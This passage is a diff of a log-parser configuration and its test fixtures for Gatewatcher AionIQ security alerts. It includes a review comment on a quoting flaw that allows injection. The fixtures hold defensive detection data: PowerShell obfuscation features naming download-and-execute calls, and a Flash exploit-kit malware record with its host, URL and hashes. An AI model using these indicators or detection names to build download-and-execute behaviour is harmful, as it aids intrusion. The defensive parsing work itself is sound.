"{{json_load.message.dns.id}}" + rule.id: "{{json_load.message.alert.signature_id|string}}" + dns.type: "{{json_load.message.dns.type}}" + url.path: "{{json_load.message.http.url}}" + file.name: "{{json_load.message.fileinfo.filename}}" + file.size: 
"{{json_load.message.fileinfo.size}}" + rule.name: "{{json_load.message.alert.signature}}" + url.domain: "{{json_load.message.http.hostname}}" + event.action: "{{json_load.message.alert.action}}" + http.version: "{{json_load.message.http.version}}" + rule.version: "{{json_load.message.alert.rule.version}}" + source.bytes: "{{json_load.message.flow.bytes_toserver}}" + file.hash.md5: "{{json_load.message.fileinfo.md5}}" + rule.category: "{{json_load.message.alert.category}}" + source.packets: "{{json_load.message.flow.pkts_toserver}}" + gatewatcher.ftp: "{{json_load.message.ftp}}" + gatewatcher.nfs: "{{json_load.message.nfs}}" + gatewatcher.rdp: "{{json_load.message.rdp}}" + gatewatcher.rfb: "{{json_load.message.rfb}}" + gatewatcher.rpc: "{{json_load.message.rpc}}" + gatewatcher.sip: "{{json_load.message.sip}}" + gatewatcher.smb: "{{json_load.message.smb}}" + gatewatcher.ssh: "{{json_load.message.ssh}}" + gatewatcher.tls: "{{json_load.message.tls}}" + file.hash.sha256: "{{json_load.message.fileinfo.sha256}}" + gatewatcher.dhcp: "{{json_load.message.dhcp}}" + gatewatcher.dnp3: "{{json_load.message.dnp3}}" + gatewatcher.krb5: "{{json_load.message.krb5}}" + gatewatcher.mqtt: "{{json_load.message.mqtt}}" + gatewatcher.smtp: "{{json_load.message.smtp}}" + gatewatcher.snmp: "{{json_load.message.snmp}}" + gatewatcher.tftp: "{{json_load.message.tftp}}" + destination.bytes: "{{json_load.message.flow.bytes_toclient}}" + dns.question.name: "{{json_load.message.dns.rrname}}" + dns.question.type: "{{json_load.message.dns.rrtype}}" + gatewatcher.http2: "{{json_load.message.http.http2}}" + gatewatcher.ikev2: "{{json_load.message.ikev2}}" + destination.packets: "{{json_load.message.flow.pkts_toclient}}" + http.request.method: "{{json_load.message.http.http_method}}" + user_agent.original: "{{json_load.message.http.http_user_agent}}" + gatewatcher.ftp_data: "{{json_load.message.ftp_data}}" + gatewatcher.email: "{{json_load.message.email}}" + http.response.status_code: 
"{{json_load.message.http.status}}" powershell: actions: - set: - event.module: '{{json_load.message.sub_type}}' - gatewatcher.sample_id: '{{json_load.message.file_id}}' - gatewatcher.scores.analysis: '{{json_load.message.scores.analysis}}' - gatewatcher.scores.proba_obfuscated: '{{json_load.message.scores.proba_obfuscated}}' - gatewatcher.scores.analysis_detailed: '{{json_load.message.scores.analysis_detailed}}' + event.module: "{{json_load.message.sub_type}}" + gatewatcher.sample_id: "{{json_load.message.file_id}}" + gatewatcher.scores.analysis: "{{json_load.message.scores.analysis}}" + gatewatcher.scores.proba_obfuscated: "{{json_load.message.scores.proba_obfuscated}}" + gatewatcher.scores.analysis_detailed: "{{json_load.message.scores.analysis_detailed}}" shellcode: actions: - set: - event.module: '{{json_load.message.event_type}}' - gatewatcher.calls: '{{json_load.message.calls}}' - gatewatcher.encodings: '{{json_load.message.encodings}}' - gatewatcher.sample_id: '{{json_load.message.sample_id}}' - gatewatcher.sub_type: '{{json_load.message.sub_type}}' + event.module: "{{json_load.message.event_type}}" + gatewatcher.calls: "{{json_load.message.calls}}" + gatewatcher.encodings: "{{json_load.message.encodings}}" + gatewatcher.sample_id: "{{json_load.message.sample_id}}" + gatewatcher.sub_type: "{{json_load.message.sub_type}}" fileinfo: actions: - set: - gatewatcher.filemagic: '{{json_load.message.fileinfo.magic}}' + gatewatcher.filemagic: "{{json_load.message.fileinfo.magic}}" dga: actions: - set: - gatewatcher.type: '{{json_load.message.type}}' - gatewatcher.domain_name: '{{json_load.message.domain_name}}' - gatewatcher.probability: '{{json_load.message.probability}}' - gatewatcher.matched_event: '{{json_load.message.matched_event}}' + gatewatcher.type: "{{json_load.message.type}}" + gatewatcher.domain_name: "{{json_load.message.domain_name}}" + gatewatcher.probability: "{{json_load.message.probability}}" + gatewatcher.matched_event: 
"{{json_load.message.matched_event}}" retrohunt: actions: - set: - gatewatcher.tlp: '{{json_load.message.tlp}}' - gatewatcher.ttp: '{{json_load.message.ttp}}' - gatewatcher.risk: '{{json_load.message.risk}}' - gatewatcher.ioc_id: '{{json_load.message.ioc_id}}' - gatewatcher.case_id: '{{json_load.message.case_id}}' - gatewatcher.families: '{{json_load.message.families}}' - gatewatcher.ioc_tags: '{{json_load.message.ioc_tags}}' - gatewatcher.ioc_type: '{{json_load.message.ioc_type}}' - gatewatcher.campaigns: '{{json_load.message.campaigns}}' - gatewatcher.ioc_value: '{{json_load.message.ioc_value}}' - gatewatcher.meta_data: '{{json_load.message.meta_data}}' - gatewatcher.relations: '{{json_load.message.relations}}' - gatewatcher.signature: '{{json_load.message.signature}}' - gatewatcher.categories: '{{json_load.message.categories}}' - gatewatcher.usage_mode: '{{json_load.message.usage_mode}}' - gatewatcher.description: '{{json_load.message.description}}' - gatewatcher.probability: '{{json_load.message.probability}}' - gatewatcher.threat_actor: '{{json_load.message.threat_actor}}' - gatewatcher.matched_event: '{{json_load.message.matched_event}}' - gatewatcher.external_links: '{{json_load.message.external_links}}' - gatewatcher.vulnerabilities: '{{json_load.message.vulnerabilities}}' - gatewatcher.ioc_updated_date: '{{json_load.message.ioc_updated_date}}' - gatewatcher.targeted_sectors: '{{json_load.message.targeted_sectors}}' - gatewatcher.ioc_creation_date: '{{json_load.message.ioc_creation_date}}' - gatewatcher.kill_chain_phases: '{{json_load.message.kill_chain_phases}}' - gatewatcher.timestamp_package: '{{json_load.message.timestamp_package}}' - gatewatcher.matched_event_type: '{{json_load.message.matched_event_type}}' - gatewatcher.targeted_countries: '{{json_load.message.targeted_countries}}' - gatewatcher.targeted_platforms: '{{json_load.message.targeted_platforms}}' - gatewatcher.targeted_organizations: '{{json_load.message.targeted_organizations}}' + 
gatewatcher.tlp: "{{json_load.message.tlp}}" + gatewatcher.ttp: "{{json_load.message.ttp}}" + gatewatcher.risk: "{{json_load.message.risk}}" + gatewatcher.ioc_id: "{{json_load.message.ioc_id}}" + gatewatcher.case_id: "{{json_load.message.case_id}}" + gatewatcher.families: "{{json_load.message.families}}" + gatewatcher.ioc_tags: "{{json_load.message.ioc_tags}}" + gatewatcher.ioc_type: "{{json_load.message.ioc_type}}" + gatewatcher.campaigns: "{{json_load.message.campaigns}}" + gatewatcher.ioc_value: "{{json_load.message.ioc_value}}" + gatewatcher.meta_data: "{{json_load.message.meta_data}}" + gatewatcher.relations: "{{json_load.message.relations}}" + gatewatcher.signature: "{{json_load.message.signature}}" + gatewatcher.categories: "{{json_load.message.categories}}" + gatewatcher.usage_mode: "{{json_load.message.usage_mode}}" + gatewatcher.description: "{{json_load.message.description}}" + gatewatcher.probability: "{{json_load.message.probability}}" + gatewatcher.threat_actor: "{{json_load.message.threat_actor}}" + gatewatcher.matched_event: "{{json_load.message.matched_event}}" + gatewatcher.external_links: "{{json_load.message.external_links}}" + gatewatcher.vulnerabilities: "{{json_load.message.vulnerabilities}}" + gatewatcher.ioc_updated_date: "{{json_load.message.ioc_updated_date}}" + gatewatcher.targeted_sectors: "{{json_load.message.targeted_sectors}}" + gatewatcher.ioc_creation_date: "{{json_load.message.ioc_creation_date}}" + gatewatcher.kill_chain_phases: "{{json_load.message.kill_chain_phases}}" + gatewatcher.timestamp_package: "{{json_load.message.timestamp_package}}" + gatewatcher.matched_event_type: "{{json_load.message.matched_event_type}}" + gatewatcher.targeted_countries: "{{json_load.message.targeted_countries}}" + gatewatcher.targeted_platforms: "{{json_load.message.targeted_platforms}}" + gatewatcher.targeted_organizations: "{{json_load.message.targeted_organizations}}" 
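Review bot: `observer.mac` is still built by string interpolation, `["{{json_load.message.ether.src_mac}}", "{{json_load.message.ether.dest_mac}}"]`, so a value containing a double quote or backslash yields something that is presumably no longer a valid JSON array, or an array with extra elements; the `filter` on that action only checks that `ether` is present, not that the two values look like MAC addresses. This line is context in the hunk (only its `filter` line was re-quoted), but since the hunk already touches every mapping in these stages it is a cheap moment to harden it. If the template engine offers a JSON-encoding filter, render the two values through it instead of quoting them by hand; otherwise extend the `filter` so the action is skipped unless both values match a MAC pattern, in the same way `source.ip` is guarded with `is_ipaddress` earlier in the hunk.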
diff --git a/GateWatcher/aioniq/tests/codebreaker.json b/GateWatcher/aioniq/tests/codebreaker.json index 5fdb0ae34..f16f95623 100644 --- a/GateWatcher/aioniq/tests/codebreaker.json +++ b/GateWatcher/aioniq/tests/codebreaker.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": 
"{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}" + } }, "expected": { "message": 
"{\"event_type\":\"powershell\",\"scores\":{\"analysis\":1890,\"analysis_detailed\":{\"CharInt\":0,\"InvokeWebRequest\":0,\"FmtStr\":0,\"WebClientInvokation\":0,\"StrReplace\":0,\"StrJoin\":0,\"SetContent\":0,\"StreamWriter\":0,\"SystemIOFile\":0,\"StreamReader\":0,\"InvokeRestMethod\":0,\"AddContent\":0,\"StartBitsTransfer\":0,\"InvokeExpression\":0,\"GetContent\":0,\"StrCat\":370,\"Base64\":1520},\"proba_obfuscated\":1.0},\"timestamp_detected\":\"2023-03-22T10:30:37.145Z\",\"uuid\":\"8906e477-02b5-4ada-abaa-67b2d41f204a\",\"severity\":1,\"type\":\"codebreaker\",\"src_ip\":\"1.1.1.1\",\"state\":\"Exploit\",\"dest_port\":\"35444\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":\"2157601933358692\",\"gcap\":\"gcap-xxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-03-22T10:32:50.269Z\",\"timestamp_analyzed\":\"2023-03-22T10:32:50.269Z\",\"src_port\":\"4242\",\"file_id\":\"03-22-2023T10:32:45_772669089795425e9ad63823ea1e7ac3_gcap-xxxxxxxx.domain.local\",\"sub_type\":\"powershell\",\"SHA256\":\"efc9380fee13f9accf1cbc2f2bb02ae430cf39d4fbfe1d766f65b500b571ca29\",\"MD5\":\"60b656e17bec0a97f5638790c78a3124\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxxxx.domain.local\"}", diff --git a/GateWatcher/aioniq/tests/dga.json b/GateWatcher/aioniq/tests/dga.json index 9f740f113..7516b7e85 100644 --- a/GateWatcher/aioniq/tests/dga.json +++ b/GateWatcher/aioniq/tests/dga.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": "{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}" + } }, "expected": { "message": 
"{\"event_type\":\"dga\",\"domain_name\":\"pgoadcmgqfacj.com\",\"timestamp_detected\":\"2023-03-22T10:25:54.903Z\",\"uuid\":\"4e4b3104-06ba-4277-899e-149a74a0671c\",\"severity\":1,\"type\":\"machine_learning\",\"probability\":0.9999731546766107,\"dest_port\":53,\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":729468278572,\"src_ip\":\"1.1.1.1\",\"@timestamp\":\"2023-03-22T10:46:08.487Z\",\"@version\":\"1\",\"matched_event\":\"041b2ed4-a5e0-4814-8bdc-7522b6d5464f\",\"timestamp_analyzed\":\"2023-03-22T10:46:08.487Z\",\"gcenter\":\"gcenter-xxxxxx.domain.local\",\"src_port\":1294}", diff --git a/GateWatcher/aioniq/tests/malcore.json b/GateWatcher/aioniq/tests/malcore.json index 996eea0b8..ebc7c83d1 100644 --- a/GateWatcher/aioniq/tests/malcore.json +++ b/GateWatcher/aioniq/tests/malcore.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; 
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470
838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}", "sekoiaio": { "intake": { "dialect": "Gatewatcher AionIQ", "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c" } - }, - "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash 
Player\",\"fileinfo\":{\"sha256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"file_id\":379,\"magic\":\"Macromedia Flash data (compressed), version 14\",\"tx_id\":1,\"state\":\"CLOSED\",\"filename\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"sid\":[1100020],\"stored\":true,\"md5\":\"67ca9a31f220bc7b68f203c07ad668b9\",\"gaps\":false,\"size\":77068},\"analyzed_suspicious\":0,\"analyzers_up\":16,\"app_proto\":\"http\",\"engines_last_update_date\":\"2023-03-08T19:03:00Z\",\"total_found\":\"10/16\",\"file_type\":\"application/x-shockwave-flash\",\"detail_scan_time\":13425,\"processing_time\":333690,\"SHA256\":\"350836364013549b6a76aab79d57d109df6acc143759e24a952d3ff5d6a76ec4\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"analyzed_clean\":5,\"event_type\":\"malware\",\"http\":{\"http_method\":\"GET\",\"http_port\":8080,\"protocol\":\"HTTP/1.1\",\"status\":200,\"hostname\":\"tsevid-synonymi.justdanceatsea.com\",\"url\":\"/6SuCHKKkf8Sf1aFXJPqD0R6r3oEDCrbwHFm23EU-Af2zwWdHgpn6mEGu5XlxFust\",\"length\":77068,\"http_content_type\":\"application/x-shockwave-flash\",\"http_user_agent\":\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)\",\"http_refer\":\"http://tsevid-synonymi.justdanceatsea.com:8080/ndf4xx22ci.php\"},\"type\":\"malcore\",\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"state\":\"Infected\",\"gcap\":\"gcap-xxxxxxxx.domain.local\",\"flow_id\":1910314914537014,\"reporting_token\":\"No GBOX\",\"src_port\":8080,\"analyzed_other\":1,\"engine_id\":{\"4\":{\"id\":\"32f2f45e6d9faf46e6954356a710208d412fac5181f6c641e34cb9956a133684\",\"threat_details\":\"SWF/Exploit.ExKit.J 
trojan\",\"scan_result\":\"INFECTED\"},\"1\":{\"id\":\"054a20c51cbe9d2cc7d6a237d6cd4e08ab1a67e170b371e632995766d3ba81af\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"9\":{\"id\":\"95603b80d80fa3e98b6faf07418a55ed0b035d19209e3ad4f1858f6b46fa070a\",\"threat_details\":\"Script.SWF.CVE-2014-0515++.C118\",\"scan_result\":\"INFECTED\"},\"14\":{\"id\":\"ecc47e2309be9838d6dc2c5157be1a840950e943f5aaca6637afca11516c3eaf\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"8\":{\"id\":\"714eca0a6475fe7d2bf9a24bcae343f657b230ff68acd544b019574f1392de77\",\"threat_details\":\"Exploit.Swf.Agent.dvtnkm\",\"scan_result\":\"INFECTED\"},\"7\":{\"id\":\"527db072abcf877d4bdcd0e9e4ce12c5d769621aa65dd2f7697a3d67de6cc737\",\"threat_details\":\"Exploit.Agent.Script.371\",\"scan_result\":\"INFECTED\"},\"2\":{\"id\":\"0ff95ddb1117d8f36124f6eac406dbbf9f17e3dd89f9bb1bd600f6ad834c25db\",\"threat_details\":\"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 
(B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}" + } }, "expected": { "message": "{\"timestamp\":\"2023-03-22T10:35:22.615360+0000\",\"analyzed_infected\":10,\"detail_threat_found\":\"Infected : Script.SWF.CVE-2014-0515+.C107 (B), Exp.SWF.Angler.D, Script.SWF.CVE-2014-0515+.C107, SWF/Exploit.ExKit.J trojan, Exploit.SWF.Agent.ja, Exploit.Agent.Script.371, Exploit.Swf.Agent.dvtnkm, Script.SWF.CVE-2014-0515++.C118, EXP/FLASH.Pubenush.E.Gen, Exploit.SWF\",\"timestamp_detected\":\"2023-03-22T10:35:22.615Z\",\"uuid\":\"2103a99c-549e-49b7-bbef-68459e6cc44e\",\"severity\":1,\"dest_port\":19609,\"detail_wait_time\":320265,\"host\":\"gcap-xxxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"timestamp_analyzed\":\"2023-03-22T10:53:13.408Z\",\"@timestamp\":\"2023-03-22T10:53:13.408Z\",\"file_type_description\":\"Macromedia Flash 